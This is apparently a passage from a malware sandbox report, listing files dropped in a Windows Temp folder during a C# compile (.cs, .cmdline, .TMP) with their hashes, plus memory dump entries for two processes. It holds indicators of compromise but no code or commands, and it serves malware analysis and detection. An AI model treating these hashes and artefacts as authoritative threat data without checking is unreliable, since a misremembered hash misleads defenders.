\??\c:\Users\Admin\AppData\Local\Temp\ozy3yow5\CSC7734D6345F43EC955E3D76D0E4DDDA.TMP

Filesize
652B

MD5
469892233627cb58d660e89d1e938d24

SHA1
78b7ff530afe9ec6d338ae132ec2d8e38ebc25c5

SHA256
1f053882b2654d719b5de0e6908cdcf2c289eef1333b2a3a93a4aee466db4ad6

SHA512
37a8a022e3e75166622cae91cceaa1e785c6efe24a11e29a41ac7a6548f1af094d6a9612081e20923905cd10b046937fe94c5fb6e74fd163b93cb0e4722eeb9b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ozy3yow5\ozy3yow5.0.cs

Filesize
249B

MD5
69ecfeb3e9a8fb7890d114ec056ffd6d

SHA1
cba5334d2ffe24c60ef793a3f6a7f08067a913db

SHA256
0a913fd594ad2da3159400fc3d7d2cc50b34f8f31675ec5ac5a41d7e79e9fd58

SHA512
be7eb5a6a8bcc7f279aee00ad650aa872fc7fc08227eedeb9cc0a4273f0382b91306f60878728eaba3c79fa8c96066b144ecea897360a11be38996f04fdd99e1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ozy3yow5\ozy3yow5.cmdline

Filesize
369B

MD5
d774db1d29ca6b9e5a01d4c1792127b7

SHA1
bf84baff46cf4730ef08a284e1748d9c57bea660

SHA256
6981c9ee9850f68670762854c7e27a2c309843280c6d43d8d77c2505078ecbad

SHA512
3415e27f37e3f111fbb3e7648e8ea82175535e1f4cc4ee922a9c47b9fce6638ebb505b35d697fe472f9bd0306b1e5d91df43f4a8b5bd5b27f0c4303ab01303fa

Download Submit
memory/208-150-0x0000000006AF0000-0x0000000006B0A000-memory.dmp

Filesize
104KB

Download
memory/208-135-0x0000000002BF0000-0x0000000002C00000-memory.dmp

Filesize
64KB

Download
memory/208-148-0x00000000065D0000-0x00000000065EE000-memory.dmp

Filesize
120KB

Download
memory/208-138-0x0000000005ED0000-0x0000000005F36000-memory.dmp

Filesize
408KB

Download
memory/208-153-0x0000000002BF0000-0x0000000002C00000-memory.dmp

Filesize
64KB

Download
memory/208-152-0x0000000007E40000-0x00000000083E4000-memory.dmp

Filesize
5.6MB

Download
memory/208-151-0x0000000006B40000-0x0000000006B62000-memory.dmp

Filesize
136KB

Download
memory/208-133-0x0000000003010000-0x0000000003046000-memory.dmp

Filesize
216KB

Download
memory/208-134-0x0000000005720000-0x0000000005D48000-memory.dmp

Filesize
6.2MB

Download
memory/208-149-0x0000000006B70000-0x0000000006C06000-memory.dmp

Filesize
600KB

Download
memory/208-154-0x0000000008A70000-0x00000000090EA000-memory.dmp

Filesize
6.5MB

Download
memory/208-137-0x0000000005DF0000-0x0000000005E56000-memory.dmp

Filesize
408KB

Download
memory/208-136-0x0000000005D50000-0x0000000005D72000-memory.dmp

Filesize
136KB

Download
memory/3592-173-0x0000000002C90000-0x0000000002CA0000-memory.dmp

Filesize
64KB

Download
memory/3592-229-0x0000000000400000-0x00000000004E7000-memory.dmp

Filesize
924KB

Download
memory/3592-239-0x0000000002C90000-0x0000000002CA0000-memory.dmp

Filesize
64KB

Download
memory/3592-240-0x0000000002C90000-0x0000000002CA0000-memory.dmp

Filesize
64KB

Download
memory/3592-174-0x0000000002C90000-0x0000000002CA0000-memory.dmp

Filesize
64KB

Download